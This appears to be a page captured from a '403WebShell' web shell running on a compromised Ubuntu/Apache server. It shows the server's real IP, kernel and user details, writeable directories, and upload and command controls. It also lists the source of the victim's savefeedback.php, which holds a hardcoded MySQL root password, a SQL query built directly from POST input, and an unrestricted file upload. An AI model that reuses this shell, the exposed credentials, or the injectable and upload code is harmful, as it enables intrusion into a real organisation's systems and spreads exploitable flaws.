????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.116.242.144
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/timereport_india/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/appsrv.astacus.se/timereport_india/savefeedback.php
<?php
	session_start();
	
	function AddPath($PathToCreate){
		$iBreak = 0;
		$iBreak = strrpos($PathToCreate, "/");
		if($iBreak !== FALSE){
			$Parent = substr($PathToCreate, 0, $iBreak);
			if(!@chdir($Parent)){
				AddPath($Parent);
			}
		}
	
		if(!@chdir($PathToCreate)){
			mkdir($PathToCreate);
		}
	}

	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("vpa");


   $ProjectId = trim($_POST['projectid']);

	$sql = "SELECT * FROM Project WHERE  ProjectId = '".$ProjectId."';";

 //  echo($sql);

    $result = mysql_query($sql);
	  $result_feed = 0;
	  while ($row = mysql_fetch_assoc($result)){ 
	  	$CustomerId =  $row['CompanyId'];
		  $result_feed = 1;
	  }

	$target_encoding = "ISO-8859-1//IGNORE";

	$Date = substr(date("Ymd"),2,6);
	
	$Ticket = $Date;
	$TargetPath = "/var/www/icad_files/$CustomerId/$ProjectId/mixedzone/Feedback from Astacus/$Ticket/";

	AddPath($TargetPath);

	$username = $_POST['username'];

	$imageFileType = strtolower(pathinfo(basename($_FILES["fileToUpload"]["name"]),PATHINFO_EXTENSION));
	$target_file = $TargetPath . date("His").".".$imageFileType;
	$target_file_txt = $TargetPath . date("His").".txt";
	
	move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file);

	$myfile = fopen($target_file_txt, "w");
	$txt = $username. " : ". $_POST['comment'];
	fwrite($myfile, $txt);
	fclose($myfile);

	

	//echo($TargetPath."<br>");
	//echo($target_file);


header("location: feedback.php?message=Tack, filen blev uppladdad!&username=".$username."&result=".$result_feed);




?>

Youez - 2016 - github.com/yon3zu
LinuXploit